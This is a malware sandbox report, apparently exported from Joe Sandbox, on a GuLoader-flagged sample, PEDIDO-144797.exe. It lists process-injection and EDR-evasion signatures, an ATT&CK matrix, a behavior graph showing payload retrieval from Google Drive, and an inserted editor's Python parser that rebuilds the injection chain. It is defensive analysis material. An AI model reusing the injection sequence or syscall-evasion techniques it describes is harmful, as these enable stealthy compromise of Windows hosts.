        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326D415F mov eax, dword ptr fs:[00000030h]2_2_326D415F
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3273314A mov eax, dword ptr fs:[00000030h]2_2_3273314A
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3273314A mov eax, dword ptr fs:[00000030h]2_2_3273314A
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3273314A mov eax, dword ptr fs:[00000030h]2_2_3273314A
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3273314A mov eax, dword ptr fs:[00000030h]2_2_3273314A
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_32775149 mov eax, dword ptr fs:[00000030h]2_2_32775149
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3272A130 mov eax, dword ptr fs:[00000030h]2_2_3272A130
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326D7128 mov eax, dword ptr fs:[00000030h]2_2_326D7128
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326D7128 mov eax, dword ptr fs:[00000030h]2_2_326D7128
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3275F13E mov eax, dword ptr fs:[00000030h]2_2_3275F13E
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326C510F mov eax, dword ptr fs:[00000030h]2_2_326C510F
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326C510F mov eax, dword ptr fs:[00000030h]2_2_326C510F
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326C510F mov eax, dword ptr fs:[00000030h]2_2_326C510F
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326C510F mov eax, dword ptr fs:[00000030h]2_2_326C510F
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326C510F mov eax, dword ptr fs:[00000030h]2_2_326C510F
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326C510F mov eax, dword ptr fs:[00000030h]2_2_326C510F
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326C510F mov eax, dword ptr fs:[00000030h]2_2_326C510F
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326C510F mov eax, dword ptr fs:[00000030h]2_2_326C510F
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326C510F mov eax, dword ptr fs:[00000030h]2_2_326C510F
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326C510F mov eax, dword ptr fs:[00000030h]2_2_326C510F
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326C510F mov eax, dword ptr fs:[00000030h]2_2_326C510F
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326C510F mov eax, dword ptr fs:[00000030h]2_2_326C510F
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326C510F mov eax, dword ptr fs:[00000030h]2_2_326C510F
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326A510D mov eax, dword ptr fs:[00000030h]2_2_326A510D
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326D0118 mov eax, dword ptr fs:[00000030h]2_2_326D0118
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269F113 mov eax, dword ptr fs:[00000030h]2_2_3269F113
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269F113 mov eax, dword ptr fs:[00000030h]2_2_3269F113
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269F113 mov eax, dword ptr fs:[00000030h]2_2_3269F113
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269F113 mov eax, dword ptr fs:[00000030h]2_2_3269F113
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269F113 mov eax, dword ptr fs:[00000030h]2_2_3269F113
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269F113 mov eax, dword ptr fs:[00000030h]2_2_3269F113
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269F113 mov eax, dword ptr fs:[00000030h]2_2_3269F113
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269F113 mov eax, dword ptr fs:[00000030h]2_2_3269F113
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269F113 mov eax, dword ptr fs:[00000030h]2_2_3269F113
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269F113 mov eax, dword ptr fs:[00000030h]2_2_3269F113
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269F113 mov eax, dword ptr fs:[00000030h]2_2_3269F113
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269F113 mov eax, dword ptr fs:[00000030h]2_2_3269F113
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269F113 mov eax, dword ptr fs:[00000030h]2_2_3269F113
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269F113 mov eax, dword ptr fs:[00000030h]2_2_3269F113
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269F113 mov eax, dword ptr fs:[00000030h]2_2_3269F113
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269F113 mov eax, dword ptr fs:[00000030h]2_2_3269F113
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269F113 mov eax, dword ptr fs:[00000030h]2_2_3269F113
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269F113 mov eax, dword ptr fs:[00000030h]2_2_3269F113
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269F113 mov eax, dword ptr fs:[00000030h]2_2_3269F113
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269F113 mov eax, dword ptr fs:[00000030h]2_2_3269F113
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269F113 mov eax, dword ptr fs:[00000030h]2_2_3269F113
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326981EB mov eax, dword ptr fs:[00000030h]2_2_326981EB
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326AA1E3 mov eax, dword ptr fs:[00000030h]2_2_326AA1E3
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326AA1E3 mov eax, dword ptr fs:[00000030h]2_2_326AA1E3
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326AA1E3 mov eax, dword ptr fs:[00000030h]2_2_326AA1E3
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326AA1E3 mov eax, dword ptr fs:[00000030h]2_2_326AA1E3
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326AA1E3 mov eax, dword ptr fs:[00000030h]2_2_326AA1E3
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326CB1E0 mov eax, dword ptr fs:[00000030h]2_2_326CB1E0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326CB1E0 mov eax, dword ptr fs:[00000030h]2_2_326CB1E0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326CB1E0 mov eax, dword ptr fs:[00000030h]2_2_326CB1E0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326CB1E0 mov eax, dword ptr fs:[00000030h]2_2_326CB1E0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326CB1E0 mov eax, dword ptr fs:[00000030h]2_2_326CB1E0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326CB1E0 mov eax, dword ptr fs:[00000030h]2_2_326CB1E0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326CB1E0 mov eax, dword ptr fs:[00000030h]2_2_326CB1E0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326A91E5 mov eax, dword ptr fs:[00000030h]2_2_326A91E5

        HIPS / PFW / Operating System Protection Evasion

        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | NtDelayExecution: Direct from: 0x50C994E
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe | NtSuspendThread: Indirect: 0x323B3909
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | NtProtectVirtualMemory: Direct from: 0x7FFFAFCA2651
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe | NtSetContextThread: Indirect: 0x323B35E9
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe | NtQueueApcThread: Indirect: 0x323AF414
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe | NtResumeThread: Indirect: 0x323B3C29
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | NtResumeThread: Direct from: 0x50C9B80
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | NtProtectVirtualMemory: Direct from: 0x50D1679
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | NtDelayExecution: Direct from: 0x50C9B0F
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | NtClose: Direct from: 0x7FFF7B7E9E7F
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe | Section loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and write
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe | Section loaded: NULL target: C:\Windows\SysWOW64\SecEdit.exe protection: execute and read and write
        Source: C:\Windows\SysWOW64\SecEdit.exe | Section loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: read write
        Source: C:\Windows\SysWOW64\SecEdit.exe | Section loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and write
        Source: C:\Windows\SysWOW64\SecEdit.exe | Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe | Thread register set: target process: 6740
        Source: C:\Windows\SysWOW64\SecEdit.exe | Thread register set: target process: 6740
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe | Thread APC queued: target process: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe | Process created: C:\Users\user\Desktop\PEDIDO-144797.exe "C:\Users\user\Desktop\PEDIDO-144797.exe"
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | Process created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\SysWOW64\SecEdit.exe"
        Source: RAVCpl64.exe, 00000003.00000002.94441142672.0000000000F20000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000003.00000000.90017357141.0000000000F20000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.91558363278.00000000015D0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Program Manager
        Source: RAVCpl64.exe, 00000003.00000002.94441142672.0000000000F20000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000003.00000000.90017357141.0000000000F20000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.91560293490.0000000004AD0000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
        Source: RAVCpl64.exe, 00000003.00000002.94441142672.0000000000F20000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000003.00000000.90017357141.0000000000F20000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.91558363278.00000000015D0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
        Source: explorer.exe, 00000005.00000002.94439556197.0000000000E79000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.91557489428.0000000000E79000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman
        Source: RAVCpl64.exe, 00000003.00000002.94441142672.0000000000F20000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000003.00000000.90017357141.0000000000F20000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.91558363278.00000000015D0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 0_2_00403489 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403489
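Added example (the editor's code, not Joe Sandbox's and not from the sample): a triage script that reads the evasion signature lines above exactly as this text export fuses them ("Source: <path><event>", with an optional trailing "Jump to behavior"), splits direct from indirect syscalls per process, and rebuilds the injection chain from the section-mapping, thread-context, APC and process-creation entries. The input list is a constructed copy of this section's own lines; the record kinds (map_rwx, map_rw, queue_apc, set_thread_context, create_process) and the rule that "executable section plus a thread primitive on the same edge equals a complete injection" are this example's own conventions, not the sandbox's.

```python
"""Rebuild the process-injection chain from Joe Sandbox evasion signature lines.

Editor's example, not Joe Sandbox code. Input is a constructed copy of the
report's own lines in the fused form of the text export.
"""
import re
from collections import Counter, defaultdict

# Constructed sample input: copied from the report's evasion section.
REPORT_LINES = [
    r"Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDelayExecution: Direct from: 0x50C994EJump to behavior",
    r"Source: C:\Users\user\Desktop\PEDIDO-144797.exeNtSuspendThread: Indirect: 0x323B3909Jump to behavior",
    r"Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtProtectVirtualMemory: Direct from: 0x7FFFAFCA2651Jump to behavior",
    r"Source: C:\Users\user\Desktop\PEDIDO-144797.exeNtSetContextThread: Indirect: 0x323B35E9Jump to behavior",
    r"Source: C:\Users\user\Desktop\PEDIDO-144797.exeNtQueueApcThread: Indirect: 0x323AF414Jump to behavior",
    r"Source: C:\Users\user\Desktop\PEDIDO-144797.exeNtResumeThread: Indirect: 0x323B3C29Jump to behavior",
    r"Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtResumeThread: Direct from: 0x50C9B80Jump to behavior",
    r"Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtProtectVirtualMemory: Direct from: 0x50D1679Jump to behavior",
    r"Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDelayExecution: Direct from: 0x50C9B0FJump to behavior",
    r"Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtClose: Direct from: 0x7FFF7B7E9E7F",
    r"Source: C:\Users\user\Desktop\PEDIDO-144797.exeSection loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and writeJump to behavior",
    r"Source: C:\Users\user\Desktop\PEDIDO-144797.exeSection loaded: NULL target: C:\Windows\SysWOW64\SecEdit.exe protection: execute and read and writeJump to behavior",
    r"Source: C:\Windows\SysWOW64\SecEdit.exeSection loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: read writeJump to behavior",
    r"Source: C:\Windows\SysWOW64\SecEdit.exeSection loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and writeJump to behavior",
    r"Source: C:\Windows\SysWOW64\SecEdit.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior",
    r"Source: C:\Users\user\Desktop\PEDIDO-144797.exeThread register set: target process: 6740Jump to behavior",
    r"Source: C:\Windows\SysWOW64\SecEdit.exeThread register set: target process: 6740Jump to behavior",
    r"Source: C:\Users\user\Desktop\PEDIDO-144797.exeThread APC queued: target process: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeJump to behavior",
    r'Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeProcess created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\SysWOW64\SecEdit.exe"Jump to behavior',
]

# The source path ends at the first ".exe"; the event is everything after it,
# minus the "Jump to behavior" link text the export leaves on most lines.
SOURCE_RE = re.compile(r"^Source: (?P<src>.+?\.exe)(?P<event>.*?)(?:Jump to behavior)?$")
SYSCALL_RE = re.compile(r"^(?P<api>Nt\w+): (?P<mode>Direct|Indirect)(?: from)?: (?P<addr>0x[0-9A-Fa-f]+)$")
SECTION_RE = re.compile(r"^Section loaded: NULL target: (?P<target>.+?\.exe) protection: (?P<prot>.+)$")
CONTEXT_RE = re.compile(r"^Thread register set: target process: (?P<pid>\d+)$")
APC_RE = re.compile(r"^Thread APC queued: target process: (?P<target>.+?\.exe)$")
CREATE_RE = re.compile(r'^Process created: (?P<target>.+?\.exe) "')


def basename(path):
    return path.rsplit("\\", 1)[-1]


def parse(lines):
    """Turn each signature line into a typed record; unknown lines are skipped."""
    records = []
    for line in lines:
        m = SOURCE_RE.match(line.strip())
        if not m:
            continue
        src, event = basename(m["src"]), m["event"].strip()
        if (s := SYSCALL_RE.match(event)):
            records.append({"src": src, "kind": "syscall", "api": s["api"],
                            "mode": s["mode"].lower(), "addr": int(s["addr"], 16)})
        elif (s := SECTION_RE.match(event)):
            kind = "map_rwx" if "execute" in s["prot"] else "map_rw"
            records.append({"src": src, "kind": kind, "target": basename(s["target"])})
        elif (s := CONTEXT_RE.match(event)):
            # Only a pid is given; resolve it against the process tree separately.
            records.append({"src": src, "kind": "set_thread_context", "target": "pid:" + s["pid"]})
        elif (s := APC_RE.match(event)):
            records.append({"src": src, "kind": "queue_apc", "target": basename(s["target"])})
        elif (s := CREATE_RE.match(event)):
            records.append({"src": src, "kind": "create_process", "target": basename(s["target"])})
    return records


def syscall_modes(records):
    """Per-process count of direct vs indirect syscalls (the EDR-bypass tell)."""
    out = defaultdict(Counter)
    for r in records:
        if r["kind"] == "syscall":
            out[r["src"]][r["mode"]] += 1
    return {proc: dict(c) for proc, c in out.items()}


def injection_edges(records):
    """(source, target) -> set of primitives observed on that edge."""
    edges = defaultdict(set)
    for r in records:
        if "target" in r:
            edges[(r["src"], r["target"])].add(r["kind"])
    return dict(edges)


def flag_injectors(edges):
    """An edge that writes an executable section and also hands the target a
    thread (APC or context set) is a complete injection, not just a mapping."""
    return [edge for edge, kinds in edges.items()
            if "map_rwx" in kinds and kinds & {"queue_apc", "set_thread_context"}]


if __name__ == "__main__":
    recs = parse(REPORT_LINES)
    print("syscalls:", syscall_modes(recs))
    for edge, kinds in injection_edges(recs).items():
        print(edge, sorted(kinds))
    print("complete injections:", flag_injectors(injection_edges(recs)))
```

On this section's lines the script reports six direct syscalls out of RAVCpl64.exe and four indirect ones out of PEDIDO-144797.exe, and flags PEDIDO-144797.exe -> RAVCpl64.exe as the one edge that combines an RWX section with an APC. The two "Thread register set" entries name only pid 6740, so they become edges to "pid:6740" and have to be joined to the process tree by hand; SecEdit.exe -> explorer.exe shows only a read-write mapping here, so the behavior graph's "injected" label for explorer.exe rests on other signatures, not on this list alone.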

        Stealing of Sensitive Information

        Source: Yara match | File source: 00000002.00000002.90098184931.00000000323D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000004.00000002.91632908078.0000000002B00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000004.00000002.91633128931.0000000002CD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

        Remote Access Functionality

        Source: Yara match | File source: 00000002.00000002.90098184931.00000000323D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000004.00000002.91632908078.0000000002B00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000004.00000002.91633128931.0000000002CD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        MITRE ATT&CK Matrix (one line per tactic, techniques in the report's column order; a bracketed number is the report's signature-count badge for that technique, kept as extracted; unnumbered entries are the matrix's default placeholders)

        Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
        Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
        Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
        Execution: [1] Native API; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
        Persistence: [1] DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
        Privilege Escalation: [1] Access Token Manipulation; [312] Process Injection; [1] Abuse Elevation Control Mechanism; [1] DLL Side-Loading; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
        Defense Evasion: [1] Masquerading; [2] Virtualization/Sandbox Evasion; [1] Access Token Manipulation; [312] Process Injection; [1] Deobfuscate/Decode Files or Information; [1] Abuse Elevation Control Mechanism; [3] Obfuscated Files or Information; [1] DLL Side-Loading
        Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
        Discovery: [121] Security Software Discovery; [2] Virtualization/Sandbox Evasion; [2] Process Discovery; [1] Application Window Discovery; [3] File and Directory Discovery; [13] System Information Discovery; Remote System Discovery; System Owner/User Discovery
        Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
        Collection: [1] Archive Collected Data; [1] Clipboard Data; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
        Command and Control: [11] Encrypted Channel; [1] Ingress Tool Transfer; [2] Non-Application Layer Protocol; [13] Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
        Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
        Impact: [1] System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
        Behavior Graph (ID: 1525501; Sample: PEDIDO-144797.exe; Startdate: 04/10/2024; Architecture: WINDOWS; Score: 100). Node numbers are the graph's own; the "counters" values are the graph's per-process created-registry-values / created-files figures, kept as shown.

        [2] Start
            Contacts: drive.usercontent.google.com; drive.google.com
            Signatures: Malicious sample detected (through community Yara rule); Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for submitted file; 2 other signatures
            -> started [10] PEDIDO-144797.exe (counters: 1 33)

        [10] PEDIDO-144797.exe
            Dropped: C:\Users\user\AppData\Local\...\System.dll (PE32)
            Signatures: Switches to a custom stack to bypass stack traces
            -> started [14] PEDIDO-144797.exe (counters: 6)

        [14] PEDIDO-144797.exe
            DNS/IP: drive.usercontent.google.com 142.250.80.97, dst port 443, src port 49733, GOOGLEUS, United States; drive.google.com 142.251.40.206, dst port 443, src port 49732, GOOGLEUS, United States
            Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Queues an APC in another process (thread injection); Found direct / indirect Syscall (likely to bypass EDR)
            -> injected [18] RAVCpl64.exe

        [18] RAVCpl64.exe
            Signatures: Found direct / indirect Syscall (likely to bypass EDR)
            -> started [21] SecEdit.exe

        [21] SecEdit.exe
            Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Switches to a custom stack to bypass stack traces
            -> injected [24] explorer.exe (counters: 54 1)

        Source | Detection | Scanner | Label
        PEDIDO-144797.exe | 100% | Avira | HEUR/AGEN.1331786
        PEDIDO-144797.exe | 34% | ReversingLabs | Win32.Trojan.Guloader
        PEDIDO-144797.exe | 39% | Virustotal |

        Source | Detection | Scanner | Label
        C:\Users\user\AppData\Local\Temp\nsvE4C5.tmp\System.dll | 0% | ReversingLabs |

        No Antivirus matches

        Source | Detection | Scanner | Label
        drive.google.com | 0% | Virustotal |
        drive.usercontent.google.com | 1% | Virustotal |

        Source | Detection | Scanner | Label
        https://api.msn.com/v1/news/Feed/Windows? | 0% | Virustotal |
        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gowI | 0% | Virustotal |
        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gyvW | 0% | Virustotal |
        https://assets.msn.com/weathermapdata/1/static/weather/Icons/MSIAWwA=/Condition/MostlyCloudyNight.pn | 0% | Virustotal |
        https://api.msn.com:443/v1/news/Feed/Windows? | 0% | Virustotal |
        https://www.msn.com/en-us/feed | 0% | Virustotal |
        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gowI-dark | 0% | Virustotal |
        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gyvW-dark | 0% | Virustotal |
        https://www.msn.com/en-us/money/markets?id=a3oxnm | 1% | Virustotal |
        https://assets.msn.com/weathermapdata/1/static/weather/Icons/MSIAWwA=/Teaser/humidity.png | 0% | Virustotal |
        https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Stock_In | 0% | Virustotal |
        https://excel.office.com | 0% | Virustotal |
        http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD | 0% | Virustotal |
        https://www.msn.com/en-us/channel/source/AZ%20Animals%20US/sr-vid-7etr9q8xun6k6508c3nufaum0de3dqktiq | 1% | Virustotal |
        http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd | 0% | Virustotal |
        https://www.google.com | 0% | Virustotal |
        https://aka.ms/odirm | 0% | Virustotal |
        https://drive.google.com/ | 0% | Virustotal |
        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13pwi3 | 0% | Virustotal |
        https://windows.msn.com:443/shell?osLocale=en-US&chosenMarketReason=ImplicitNew | 0% | Virustotal |
        https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214 | 0% | Virustotal |
        Name | IP | Active | Malicious | Antivirus Detection | Reputation
        drive.google.com | 142.251.40.206 | true | false | | unknown
        drive.usercontent.google.com | 142.250.80.97 | true | false | | unknown
        Name | Source | Malicious | Antivirus Detection | Reputation
        https://api.msn.com/v1/news/Feed/Windows? | explorer.exe, 00000005.00000002.94452035443.000000000D2BF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.91565423827.000000000D2BF000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
        https://assets.msn.com/weathermapdata/1/static/weather/Icons/MSIAWwA=/Condition/MostlyCloudyNight.pn | explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gowI | explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
        https://www.msn.com/en-us/news/politics/chris-christie-former-trump-debate-coach-offers-key-pieces-o | explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
        https://www.msn.com/en-us/sports/nfl/49ers-win-over-jets-ends-with-final-score-that-s-never-been-see | explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
        https://www.msn.com/en-us/news/us/james-earl-jones-s-talents-went-far-far-beyond-his-magnificent-voi | explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
        https://www.msn.com/en-us/money/retirement/a-youtuber-asked-a-group-of-americans-aged-70-to-80-what- | explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gyvW | explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
